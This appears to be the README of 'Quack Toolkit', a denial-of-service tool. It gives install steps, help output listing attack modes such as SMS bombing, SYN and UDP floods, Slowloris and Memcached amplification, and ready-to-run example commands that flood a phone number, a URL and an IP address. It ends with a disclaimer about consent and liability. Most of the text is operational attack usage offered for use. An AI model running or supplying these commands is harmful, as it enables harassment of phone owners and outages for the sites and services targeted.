Quack Toolkit is a set of tools to provide denial
of service attacks. Quack Toolkit includes SMS attack
tool, HTTP attack tool and many other attack tools.
cd quack
chmod +x install.sh
./install.sh
cd quack
chmod +x uninstall.sh
./uninstall.sh
To run Quack Toolkit you should
execute the following command.
quack
usage: quack [-h] [--target <ip:port/URL/phone>]
[--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]]
[--timeout <timeout>] [--threads <threads>] [-u] [--version]
optional arguments:
-h, --help show this help message and exit
--target <ip:port/URL/phone>
Target IP and port, URL or phone.
--tool [SMS|NTP|TCP|UDP|SYN|POD|SLOWLORIS|MEMCACHED|HTTP|NJRAT]
Attack tool.
--timeout <timeout> Timeout in seconds.
--threads <threads> Threads count.
-u, --update Update Quack Toolkit.
--version Show Quack Toolkit version.
quack --tool SMS --target 15554443333 --timeout 10 --threads 10
quack --tool HTTP --target http://example.com/ --timeout 10 --threads 10
quack --tool TCP --target 192.168.1.100:80 --timeout 10 --threads 10
Usage of the Quack Toolkit for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state, federal, and international laws.
Developers assume no liability and are not responsible for any misuse or damage caused by this program.